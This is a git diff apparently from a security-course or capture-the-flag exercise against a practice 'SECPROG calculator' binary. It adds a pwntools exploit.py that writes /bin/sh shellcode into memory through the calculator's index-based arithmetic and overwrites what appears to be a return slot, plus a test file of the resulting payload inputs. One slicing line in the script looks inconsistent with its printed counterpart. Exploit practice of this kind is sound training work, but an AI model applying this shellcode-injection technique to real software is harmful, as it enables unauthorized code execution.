6 files changed, 41 insertions, 7 deletions

diff --git a/bruh.py b/bruh.py
deleted file mode 100755
index ca71230..0000000
--- a/bruh.py
+++ /dev/null
@@ -1,5 +0,0 @@
-#!/usr/bin/env python3
-for x in range(147460):
-    print("99", end='')
-print("")
-
diff --git a/calc.i64 b/calc.i64
index f0ede19..e56120b 100644
--- a/calc.i64
+++ b/calc.i64
diff --git a/core b/core
new file mode 100644
index 0000000..daf8a1f
--- /dev/null
+++ b/core
diff --git a/exploit.py b/exploit.py
new file mode 100755
index 0000000..b765e85
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+from pwn import *
+
+
+context.binary = './calc'
+
+shellcode = asm(shellcraft.sh())
+
+pid = process("./calc")
+
+print(shellcode.hex())
+print(context)
+
+shellen = len(shellcode)
+
+for exec_num,offset in enumerate(reversed(range(361, int(len(shellcode) / 4) + 361))): 
+    pid.sendline("+{}+{}".format(offset, int.from_bytes(shellcode[((exec_num + 1) * 1):(exec_num * 4)], 'big')))
+    print("+{}+{}".format(offset, int.from_bytes(shellcode[shellen - ((exec_num + 1) * 4):shellen - (exec_num * 4)], 'big')))
+    
+
+pid.sendline("+360+135151459")
+print("+360+135151459")
+#pid.interactive()
+
+print(pid.recv())
+
diff --git a/sout b/sout
new file mode 100644
index 0000000..1b4930b
--- /dev/null
+++ b/sout
@@ -0,0 +1 @@
+=== Welcome to SECPROG calculator ===
diff --git a/stest b/stest
index 9b7062f..2d26487 100644
--- a/stest
+++ b/stest
@@ -1,2 +1,14 @@
--7+1234
--8+134517012
++371+795371626
++370+1752379183
++369+1852400175
++368+23651209
++367+2164326657
++366+1769088052
++365+3375431937
++364+1493461585
++363+2303844609
++362+1792160225
++361+2160941067
++360+135151459
+bruh
+